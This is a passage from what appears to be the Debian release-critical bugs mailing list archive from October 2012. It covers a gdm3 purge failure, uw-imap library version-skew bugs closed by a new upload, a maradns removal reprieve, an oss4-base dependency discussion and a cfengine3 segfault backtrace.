insserv: warning: script 'LOCAL-fw' missing LSB tags and overrides
userdel: user Debian-gdm is currently logged in
/usr/sbin/deluser: `/usr/sbin/userdel Debian-gdm' returned error code 8. 
Exiting.
/usr/sbin/delgroup: `Debian-gdm' still has `Debian-gdm' as their primary group!
dpkg: error processing gdm3 (--purge):
 subprocess installed post-removal script returned error exit status 128
Processing triggers for man-db ...
configured to not write apport reports
  Processing triggers for gconf2 ...
Processing triggers for hicolor-icon-theme ...
Errors were encountered while processing:
 gdm3
E: Sub-process /usr/bin/dpkg returned an error code (1)


-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'unstable'), (500, 'stable'), (500, 
'oldstable'), (101, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 3.1.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages gdm3 depends on:
ii  accountsservice0.6.15-2
ii  adduser3.113
ii  awesome [x-window-manager] 3.4.11-1
ii  dconf-gsettings-backend0.10.0-3
ii  debconf [debconf-2.0]  1.5.41
ii  flwm [x-window-manager]1.02+cvs20080422-9
ii  fvwm [x-window-manager]1:2.5.30.ds-1
ii  gconf2 2.32.4-1
ii  gnome-session-bin  3.2.1-1
ii  gsettings-desktop-schemas  3.2.0-2
ii  libaccountsservice00.6.15-2
ii  libatk1.0-02.2.0-2
ii  libattr1   1:2.4.46-5
ii  libaudit0  1.7.18-1
ii  libc6  2.13-24
ii  libcairo-gobject2  1.10.2-6.2
ii  libcairo2  1.10.2-6.2
ii  libcanberra-gtk3-0 0.28-3
ii  libcanberra0   0.28-3
ii  libdbus-1-31.4.16-1
ii  libdbus-glib-1-2   0.98-1
ii  libfontconfig1 2.8.0-3
ii  libfreetype6   2.4.8-1
ii  libgconf2-42.32.4-1
ii  libgdk-pixbuf2.0-0 2.24.0-2
ii  libglib2.0-0   2.30.2-4
ii  libglib2.0-bin 2.30.2-4
ii  libgtk-3-0 3.2.3-1
ii  libpam-modules 1.1.3-6
ii  libpam-runtime 1.1.3-6
ii  libpam0g   1.1.3-6
ii  libpango1.0-0  1.29.4-2
ii  librsvg2-common2.34.2-2
ii  libselinux12.1.0-4
ii  libupower-glib10.9.15-1
ii  libwrap0   7.6.q-22
ii  libx11-6   2:1.4.4-4
ii  libxau61:1.0.6-4
ii  libxdmcp6  1:1.1.0-4
ii  libxklavier16  5.1-3
ii  libxrandr2 2:1.3.2-2
ii  lsb-base   3.2-28
ii  lxsession [x-session-manager]  0.4.6.1-1
ii  openbox [x-window-manager] 3.5.0-2
ii  policykit-1-gnome  0.105-1
ii  

Processed: limit source to uw-imap, tagging 682256

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 #uw-imap (8:2007f~dfsg-2) unstable; urgency=medium
 #
 #  * Disable unnecessarily strict version check (Closes: #682256).
 #
 limit source uw-imap
Limiting to bugs with field 'source' containing at least one of 'uw-imap'
Limit currently set to 'source':'uw-imap'

 tags 682256 + pending
Bug #682256 [libc-client2007e] libc-client2007e: libc-client upgrade breaks 
uw-imapd
Bug #686393 [libc-client2007e] breaks programms that depend on libc-client2007e
Bug #688027 [libc-client2007e] prayer cannot connect to session server
Added tag(s) pending.
Added tag(s) pending.
Added tag(s) pending.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
682256: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=682256
686393: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=686393
688027: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688027
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#636158: maradns: Debian default config is not robust to user change + upgrade

2012-10-25 Thread Nicholas Bamber
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Dear Debian Release Team,
Please could I have a stay of execution on maradns? I am somewhat
overwhelmed with stuff at the moment but I am steadily working my way
through it (including the Debian stuff). And the maradns RC bug came
fairly late in the whole release cycle.

I would also accept an NMU if one turns up.

On 23/10/12 17:42, gregor herrmann wrote:
 On Wed, 26 Sep 2012 17:59:17 +0200, gregor herrmann wrote:
 
 Find attached a quick patch which seems to work (as in: create 
 /etc/maradns/mararc on a new install and leave it alone for 
 upgrades). Of course the template could be put somewhere else,
 and the nested conditions in the postinst written differently.
 
 Hi Nicholas,
 
 I noticed that maradns is on the Release Team's removal candidate 
 list: https://lists.debian.org/debian-devel/2012/10/msg00373.html
 
 Are you going to upload a fix before Friday (or to contact them)
 or can I help in any way?
 
 Cheers, gregor
 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBCAAGBQJQia0+AAoJELbE2bY7/+c8SMsP/0J1L8VbJZcsJ6VXw7d14hp0
dSEyxzxlXU3LZcV7k1A7DATd8Ut9Fg2uDCs4l1X9qkz4oVkBy4OqLL5UIRl7Bb0x
XfkcygoZwvYcDgHiA04mSeo1ILXq6DVVisy5aGM72Nhoaiasbok14LTW/El5qSy6
PdcE63yT/vJ3B5ZSBSEmoSTI1SA1hRijwTCZtq49qcWsUa+DqA3IKoMhKXA/VmaK
1xhpPDA7A//o12FQuenY4jDgK/qCRyj390OqT1cobJa1EU6PUyYAWlNudShhN04L
IfW3XhdF8jiuSddGo4FVclmdc66a5A0w3Gr3PELDHACoDnxyd/ZCOEEF7jt+dQr7
Tzy4H6o+y1iy35p6uuTgz4zyQ/xMwxc0H6Y5SwFsw7lHnxm461bNJdbv9xnBsgHI
Mr2wGVdvJ7PgLxugvKfLQU9ay77mjpMY1iKSYuY3pcm2bVydA6ajE39xg8seJSLz
6t6SDF71V796RWgs8C6RxUZ/iPprFvBQJsREA4d9otlL6lQ/p8Ex/EmHbcZCeAbC
U6Kf7km7a5xt153O02MhorPC/AY/OIwViHcHU4Yz2JeeXtE2I5Js4flrg9l9yK0U
M0SvdhByDcFoDnLhlMek1vwcfD1NdUujGy6uZi0oV5BpdpDvpC0eFQJS4c0UMb1H
WecPVO6LsfN/6gCw98ZN
=3re5
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#686393: marked as done (breaks programms that depend on libc-client2007e)

2012-10-25 Thread Debian Bug Tracking System
Your message dated Thu, 25 Oct 2012 21:33:18 +
with message-id e1trv3g-kl...@franck.debian.org
and subject line Bug#682256: fixed in uw-imap 8:2007f~dfsg-2
has caused the Debian Bug report #682256,
regarding breaks programms that depend on libc-client2007e
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
682256: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=682256
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: libc-client2007e
Version: 8:2007f~dfsg-1
Severity: normal

In #682256 Heikki Levanto wrote:

 Package: libc-client2007e
 Version: 8:2007f~dfsg-1
 
 When upgrading libc-client2007e package, uw-imapd stops working.
 
 uw-imapd breaks with 
   heikki@locatelli:~$ nc localhost 143
 * BYE [ALERT] IMAP4rev1 server crashing: c-client library version 
 skew, app=2007e library=2007f

The same happens also to mailsync. To quote #685897 :

 $ mailsync -h
 Error: c-client library version skew, app=2007e library=2007f
 A fatal error occured - terminating
 Aborted

I could make mailsync build-depend on 8:2007f~dfsg-1, however I suspect,
that this libc-client version is also breaking other packages. Thus it
would maybe be better to fix the library.

Opinions?

I'm copying this to the maintainers of the other packages that depend on
libc-client (php5-imap, libmail-cclient-perl, prayer).

I think we should decide quickly, before we release wheezy with a broken
mailsync (or other libc-client based program).
*t

-- System Information:
Debian Release: wheezy/sid
  APT prefers precise-updates
  APT policy: (500, 'precise-updates'), (500, 'precise-security'), (500, 
'precise'), (100, 'precise-backports')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-29-generic (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages libc-client2007e depends on:
ii  libc6 2.15-0ubuntu10
ii  libgssapi-krb5-2  1.10+dfsg~beta1-2ubuntu0.3
ii  libkrb5-3 1.10+dfsg~beta1-2ubuntu0.3
ii  libpam-modules1.1.3-7ubuntu2
ii  libpam0g  1.1.3-7ubuntu2
ii  libssl1.0.0   1.0.1-4ubuntu5.5
ii  mlock 8:2007e~dfsg-3.2ubuntu1

libc-client2007e recommends no packages.

Versions of packages libc-client2007e suggests:
ii  uw-mailutils  8:2007e~dfsg-3.2ubuntu1

-- no debconf information
---End Message---
---BeginMessage---
Source: uw-imap
Source-Version: 8:2007f~dfsg-2

We believe that the bug you reported is fixed in the latest version of
uw-imap, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 682...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Magnus Holmgren holmg...@debian.org (supplier of updated uw-imap package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Thu, 25 Oct 2012 23:00:39 +0200
Source: uw-imap
Binary: libc-client2007e-dev libc-client2007e mlock uw-mailutils
Architecture: source amd64
Version: 8:2007f~dfsg-2
Distribution: unstable
Urgency: medium
Maintainer: Magnus Holmgren holmg...@debian.org
Changed-By: Magnus Holmgren holmg...@debian.org
Description: 
 libc-client2007e - c-client library for mail protocols - library files
 libc-client2007e-dev - c-client library for mail protocols - development files
 mlock  - mailbox locking program
 uw-mailutils - c-client support programs
Closes: 682256 686448
Changes: 
 uw-imap (8:2007f~dfsg-2) unstable; urgency=medium
 .
   * New maintainer (Closes: #686448).
   * Disable unnecessarily strict version check (Closes: #682256).
Checksums-Sha1: 
 421cc20b02423241f2a79f9b1574ddd0b59f161c 1490 uw-imap_2007f~dfsg-2.dsc
 d41d9947d954bfdf6c3019d4779852d29160645f 48920 
uw-imap_2007f~dfsg-2.debian.tar.gz
 f81899aa8943cc600f443e619e73036052468c1a 730142 
libc-client2007e-dev_2007f~dfsg-2_amd64.deb
 197a646d56de02c9b931b45d5813921ee03be96c 758432 
libc-client2007e_2007f~dfsg-2_amd64.deb
 05b2f212de978cffe60c35a305005b7d5af48885 34036 mlock_2007f~dfsg-2_amd64.deb
 011c28e19c6c4c072f05e3adbdd7c46481f080b5 63068 
uw-mailutils_2007f~dfsg-2_amd64.deb
Checksums-Sha256: 
 e502ed4d41638d84a5996b1d39e21747588cc45ffd75b3b3ffbeb6175083b380 1490 

Bug#682256: marked as done (libc-client2007e: libc-client upgrade breaks uw-imapd)

2012-10-25 Thread Debian Bug Tracking System
Your message dated Thu, 25 Oct 2012 21:33:18 +
with message-id e1trv3g-kl...@franck.debian.org
and subject line Bug#682256: fixed in uw-imap 8:2007f~dfsg-2
has caused the Debian Bug report #682256,
regarding libc-client2007e: libc-client upgrade breaks uw-imapd
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
682256: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=682256
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: libc-client2007e
Version: 8:2007f~dfsg-1
Severity: normal

Dear Maintainer,

When upgrading libc-client2007e package, uw-imapd stops working.

uw-imapd breaks with 
  heikki@locatelli:~$ nc localhost 143
  * BYE [ALERT] IMAP4rev1 server crashing: c-client library version 
skew, app=2007e library=2007f

It seems that uw-imapd is no longer supported in wheezy, I can live with
that. But upgrading another package should not break existing installations.

I think the package libc-client2007e, version Installed: 8:2007f~dfsg-1,
should have a conflicts with uw-imapd (at least latest version,
8:2007e~dfsg-3.3).

That way, upgrading libc-client will be blocked if there is a uw-imapd
installed on the system, and the sysadmin will see there is a problem, 
and can deal with it before his mail users start complaining. (that's
how I found out about the problem).


For info:
apt-cache policy uw-imapd libc-client2007e
uw-imapd:
  Installed: 8:2007e~dfsg-3.3
  Candidate: 8:2007e~dfsg-3.3
  Version table:
 *** 8:2007e~dfsg-3.3 0
100 /var/lib/dpkg/status
libc-client2007e:
  Installed: 8:2007f~dfsg-1
  Candidate: 8:2007f~dfsg-1
  Version table:
 *** 8:2007f~dfsg-1 0
500 http://ftp.dk.debian.org/debian/ wheezy/main amd64 Packages
100 /var/lib/dpkg/status

It is entirely possible that I have misunderstood the situation, and some
other packaging changes would be more helpful. 


-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 3.1.0-1-amd64 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages libc-client2007e depends on:
ii  libc6 2.13-33
ii  libcomerr21.42.4-3
ii  libgssapi-krb5-2  1.10.1+dfsg-1
ii  libk5crypto3  1.10.1+dfsg-1
ii  libkrb5-3 1.10.1+dfsg-1
ii  libpam-modules1.1.3-7.1
ii  libpam0g  1.1.3-7.1
ii  libssl1.0.0   1.0.1c-3
ii  mlock 8:2007f~dfsg-1

libc-client2007e recommends no packages.

Versions of packages libc-client2007e suggests:
ii  uw-mailutils  8:2007f~dfsg-1

-- no debconf information
---End Message---
---BeginMessage---
Source: uw-imap
Source-Version: 8:2007f~dfsg-2

We believe that the bug you reported is fixed in the latest version of
uw-imap, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 682...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Magnus Holmgren holmg...@debian.org (supplier of updated uw-imap package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Thu, 25 Oct 2012 23:00:39 +0200
Source: uw-imap
Binary: libc-client2007e-dev libc-client2007e mlock uw-mailutils
Architecture: source amd64
Version: 8:2007f~dfsg-2
Distribution: unstable
Urgency: medium
Maintainer: Magnus Holmgren holmg...@debian.org
Changed-By: Magnus Holmgren holmg...@debian.org
Description: 
 libc-client2007e - c-client library for mail protocols - library files
 libc-client2007e-dev - c-client library for mail protocols - development files
 mlock  - mailbox locking program
 uw-mailutils - c-client support programs
Closes: 682256 686448
Changes: 
 uw-imap (8:2007f~dfsg-2) unstable; urgency=medium
 .
   * New maintainer (Closes: #686448).
   * Disable unnecessarily strict version check (Closes: #682256).
Checksums-Sha1: 
 421cc20b02423241f2a79f9b1574ddd0b59f161c 1490 uw-imap_2007f~dfsg-2.dsc
 d41d9947d954bfdf6c3019d4779852d29160645f 48920 
uw-imap_2007f~dfsg-2.debian.tar.gz
 f81899aa8943cc600f443e619e73036052468c1a 730142 
libc-client2007e-dev_2007f~dfsg-2_amd64.deb
 197a646d56de02c9b931b45d5813921ee03be96c 758432 

Bug#688027: marked as done (prayer cannot connect to session server)

2012-10-25 Thread Debian Bug Tracking System
Your message dated Thu, 25 Oct 2012 21:33:18 +
with message-id e1trv3g-kl...@franck.debian.org
and subject line Bug#682256: fixed in uw-imap 8:2007f~dfsg-2
has caused the Debian Bug report #682256,
regarding prayer cannot connect to session server
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
682256: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=682256
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: prayer
Version: 1.3.4-dfsg1-1
Severity: important

Dear Maintainer,

I wanted to give prayer a try on a freshly installed Debian Wheezy
system. After going through prayer.cf, enabling it in
/etc/default/prayer and starting it, I browsed to the webinterface to
login. I entered my username and password, pressed the login button
and got the following message from prayer:

--- begin ---
Couldn't connect to Webmail session server

Try again later
---  end  ---

After having a look at the prayer and prayer-session manpage, I
decided to start prayer-session manually. This resulted in the
following:

# prayer-session
prayer PANICLOG:
  Failed to open panic log file: paniclog
  Error was: Sep 18 13:51:09 [6961] Fatal error: c-client library version skew, 
app=2007e library=2007f
Aborted
# echo $?
134
# ldd /usr/sbin/prayer-session | grep c-client
libc-client.so.2007e = /usr/lib/libc-client.so.2007e (0xb74ea000)
# apt-cache --names-only search libc-client
libc-client2007e - c-client library for mail protocols - library files
libc-client2007e-dev - c-client library for mail protocols - development files
# apt-cache policy libc-client2007e
libc-client2007e:
  Installed: 8:2007f~dfsg-1
  Candidate: 8:2007f~dfsg-1
  Version table:
 *** 8:2007f~dfsg-1 0
500 http://ftp.be.debian.org/debian/ wheezy/main i386 Packages
100 /var/lib/dpkg/status

Since the error complains about the fact that app=2007e and
library=2007f, I wonder why apt-cache shows that the version of the
library is '8:2007f~dfsg-1' while the version string in the package
filename is '2007e'. Might this be the reason that prayer fails to
fork a prayer-session when I try to login? If so, it currently makes
the package unusable.


Kind regards

Frank

-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 3.2.0-3-486
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages prayer depends on:
ii  adduser 3.113+nmu3
ii  libc-client2007e8:2007f~dfsg-1
ii  libc6   2.13-35
ii  libdb5.15.1.29-5
ii  libldap-2.4-2   2.4.31-1
ii  libssl1.0.0 1.0.1c-4
ii  libtidy-0.99-0  20091223cvs-1.2
ii  logrotate   3.8.1-4
ii  postfix [mail-transport-agent]  2.9.3-2.1
ii  ssl-cert1.0.31
ii  zlib1g  1:1.2.7.dfsg-13

prayer recommends no packages.

Versions of packages prayer suggests:
ii  aspell   0.60.7~20110707-1
ii  dovecot-imapd [imap-server]  1:2.1.7-2
pn  prayer-accountd  none
pn  prayer-templates-src none

-- Configuration Files:
/etc/default/prayer changed [not included]
/etc/prayer/prayer.cf changed [not included]

-- no debconf information
---End Message---
---BeginMessage---
Source: uw-imap
Source-Version: 8:2007f~dfsg-2

We believe that the bug you reported is fixed in the latest version of
uw-imap, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 682...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Magnus Holmgren holmg...@debian.org (supplier of updated uw-imap package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Thu, 25 Oct 2012 23:00:39 +0200
Source: uw-imap
Binary: libc-client2007e-dev libc-client2007e mlock uw-mailutils
Architecture: source amd64
Version: 8:2007f~dfsg-2
Distribution: unstable
Urgency: medium
Maintainer: Magnus Holmgren holmg...@debian.org
Changed-By: Magnus Holmgren holmg...@debian.org
Description: 
 libc-client2007e - 

Bug#636158: maradns: Debian default config is not robust to user change + upgrade

2012-10-25 Thread Niels Thykier
On 2012-10-25 23:21, Nicholas Bamber wrote:
 Dear Debian Release Team,
   Please could I have a stay of execution on maradns? I am somewhat
 overwhelmed with stuff at the moment but I am steadily working my way
 through it (including the Debian stuff). And the maradns RC bug came
 fairly late in the whole release cycle.
 
   I would also accept an NMU if one turns up.
 
 [...]

Certainly.  I have taken maradns off the list for now.  Would an extra
week enough?

~Niels


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#636158: maradns: Debian default config is not robust to user change + upgrade

2012-10-25 Thread Nicholas Bamber
On 25/10/12 22:35, Niels Thykier wrote:
 On 2012-10-25 23:21, Nicholas Bamber wrote:
 Dear Debian Release Team,
  Please could I have a stay of execution on maradns? I am somewhat
 overwhelmed with stuff at the moment but I am steadily working my way
 through it (including the Debian stuff). And the maradns RC bug came
 fairly late in the whole release cycle.

  I would also accept an NMU if one turns up.

 [...]
 
 Certainly.  I have taken maradns off the list for now.  Would an extra
 week enough?
 
 ~Niels
 

Thanks. I'll probably being looking at it from Monday.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 1 errors): limit source to uw-imap, tagging 682256, limit package to wnpp, tagging 686448

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 #uw-imap (8:2007f~dfsg-2) unstable; urgency=medium
 #
 #  * New maintainer (Closes: #686448).
 #  * Disable unnecessarily strict version check (Closes: #682256).
 #
 limit source uw-imap
Limiting to bugs with field 'source' containing at least one of 'uw-imap'
Limit currently set to 'source':'uw-imap'

 tags 682256 + pending
Bug #682256 {Done: Magnus Holmgren holmg...@debian.org} [libc-client2007e] 
libc-client2007e: libc-client upgrade breaks uw-imapd
Bug #686393 {Done: Magnus Holmgren holmg...@debian.org} [libc-client2007e] 
breaks programms that depend on libc-client2007e
Bug #688027 {Done: Magnus Holmgren holmg...@debian.org} [libc-client2007e] 
prayer cannot connect to session server
Added tag(s) pending.
Added tag(s) pending.
Added tag(s) pending.
 limit package wnpp
Limiting to bugs with field 'package' containing at least one of 'wnpp'
Limit currently set to 'source':'uw-imap'
 'package':'wnpp'

 tags 686448 + pending
source: ' does not match at least one of uw-imap
Failed to alter tags of Bug 686448: limit failed for bugs: 686448.

 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
682256: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=682256
686393: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=686393
688027: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688027
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#636158: maradns: Debian default config is not robust to user change + upgrade

2012-10-25 Thread gregor herrmann
On Thu, 25 Oct 2012 22:21:04 +0100, Nicholas Bamber wrote:

   Please could I have a stay of execution on maradns? I am somewhat
 overwhelmed with stuff at the moment but I am steadily working my way
 through it (including the Debian stuff). And the maradns RC bug came
 fairly late in the whole release cycle.
 
   I would also accept an NMU if one turns up.

I can upload the package with the patch I sent earlier if you're ok
with it; I just didn't want to go ahead with an NMU since we were
talking the exact same day on IRC and I knew that you are aware of
the bug :)
 
Cheers, gregor

-- 
 .''`.  Homepage: http://info.comodo.priv.at/ - OpenPGP key 0xBB3A68018649AA06
 : :' : Debian GNU/Linux user, admin, and developer  -  http://www.debian.org/
 `. `'  Member of VIBE!AT  SPI, fellow of the Free Software Foundation Europe
   `-   NP: R.E.M.: Everybody Hurts


signature.asc
Description: Digital signature


Bug#690574: oss4-base: depends on linux-sound-base

2012-10-25 Thread Steven Chamberlain
Hi,

As far as I can tell, linux-sound-base ships only two files that are of
interest to oss4-base:

/lib/linux-sound-base/noALSA.modprobe.conf
/lib/linux-sound-base/noOSS.modprobe.conf

oss4-base needs those so it can install symlinks to them.


They are auto-generated from:

debian/ALSA-module-list
debian/OSS-module-list

by the alsa-driver source package's debian/rules.  So I guess that the
oss4 source package could just build+ship those itself, perhaps even as
regular files instead of symlinks.


Also I'm curious if, once the dependency on linux-sound-base is dropped,
maybe oss4-base would become useful to kFreeBSD or Hurd (providing tools
like ossplay etc.).

Regards,
-- 
Steven Chamberlain
ste...@pyro.eu.org


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#688267: marked as done (cfengine3: cf-agent segfaults)

2012-10-25 Thread Debian Bug Tracking System
Your message dated Fri, 26 Oct 2012 00:11:29 +0200
with message-id 5089b911.4080...@thykier.net
and subject line Re: cfengine3: cf-agent segfaults
has caused the Debian Bug report #688267,
regarding cfengine3: cf-agent segfaults
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
688267: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688267
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: cfengine3
Version: 3.0.5+dfsg-1
Severity: serious

Hi!

  cf-agent segfaults here, attached is a backtrace

Regards

Christoph

-- System Information:
Debian Release: 6.0.5
  APT prefers stable
  APT policy: (990, 'stable'), (500, 'stable-updates')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/2 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages cfengine3 depends on:
ii  libc6  2.11.3-3  Embedded GNU C Library: Shared lib
ii  libdb4.8   4.8.30-2  Berkeley v4.8 Database Libraries [
ii  libpcre3   8.02-1.1  Perl 5 Compatible Regular Expressi
ii  libssl0.9.80.9.8o-4squeeze13 SSL shared libraries

cfengine3 recommends no packages.

cfengine3 suggests no packages.

-- Configuration Files:
/etc/default/cfengine3 changed:
RUN_CFMONITORD=0
RUN_CFSERVERD=0
RUN_CFEXECD=1
CFMONITORD_OPTS=
CFSERVERD_OPTS=
CFEXECD_OPTS=


-- no debconf information
# gdb cf-agent
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as x86_64-linux-gnu.
For bug reporting instructions, please see:
http://www.gnu.org/software/gdb/bugs/...
Reading symbols from /usr/sbin/cf-agent...Reading symbols from 
/usr/lib/debug/usr/sbin/cf-agent...done.
(no debugging symbols found)...done.
(gdb) run
Starting program: /usr/sbin/cf-agent 
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
__strlen_sse2 () at ../sysdeps/x86_64/multiarch/../strlen.S:31
31  ../sysdeps/x86_64/multiarch/../strlen.S: Datei oder Verzeichnis nicht 
gefunden.
in ../sysdeps/x86_64/multiarch/../strlen.S
Current language:  auto
The current source language is auto; currently asm.
(gdb) bt full
#0  __strlen_sse2 () at ../sysdeps/x86_64/multiarch/../strlen.S:31
No locals.
#1  0x00415e8c in DeleteDB (dbp=0x828900, key=0x0) at dbm_api.c:249
No locals.
#2  0x00454a34 in RemoveLock (name=0x0) at transaction.c:580
dbp = 0x828900
#3  0x004550ed in YieldCurrentLock (this=...) at transaction.c:268
No locals.
#4  0x0040c5b8 in VerifyPackagesPromise (pp=0x76e680) at 
verify_packages.c:78
a = {output = {level = 0x0, promiser_type = 0x0}, select = {name = 0x0, 
path = 0x0, perms = 0x0, bsdflags = 0x0, owners = 0x0, groups = 0x0, 
max_size = 0, min_size = 0, max_ctime = 0, min_ctime = 0, max_mtime 
= 0, min_mtime = 0, max_atime = 0, min_atime = 0, exec_regex = 0x0, 
exec_program = 0x0, filetypes = 0x0, issymlinkto = 0x0, result = 
0x0}, perms = {plus = 0, minus = 0, owners = 0x0, groups = 0x0, 
findertype = 0x0, plus_flags = 0, minus_flags = 0, rxdirs = 0}, 
copy = {source = 0x0, destination = 0x0, compare = cfa_atime, 
link_type = cfa_symlink, servers = 0x0, link_instead = 0x0, 
copy_links = 0x0, backup = cfa_backup, stealth = 0, preserve = 0, collapse = 0, 
check_root = 0, type_check = 0, force_update = 0, force_ipv4 = 0, 
min_size = 0, max_size = 0, trustkey = 0, encrypt = 0, verify = 0, purge = 0, 
portnumber = 0}, delete = {dirlinks = cfa_linkdelete, rmdirs = 0}, 
rename = {newname = 0x0, disable_suffix = 0x0, disable = 0, rotate = 0, 
plus = 0, minus = 0}, change = {hash = cf_md5, report_changes = 
cfa_noreport, report_diffs = 0, update = 0}, link = {source = 0x0, 
link_type = cfa_symlink, copy_patterns = 0x0, when_no_file = 
cfa_force, when_linking_children = cfa_override, link_children = 0}, edits = {
backup = cfa_backup, empty_before_use = 0, maxfilesize = 0, 
joinlines = 0}, packages = {package_policy = cfa_addpack, have_package_methods 
= 0, 
package_version = 0x0, package_architectures = 0x0, package_select 
= cfa_cmp_none, package_changes = cfa_bulk, package_file_repositories = 0x0, 
  

Bug#691202: Bug#691203: Missing B-D to ant

2012-10-25 Thread Andrew Ross
tags 691202 + unreproducible
tags 691203 + unreproducible
thanks

I've just built this package in both stable and testing using pbuilder
with no problems. I'm marking as unreproducible and will close unless
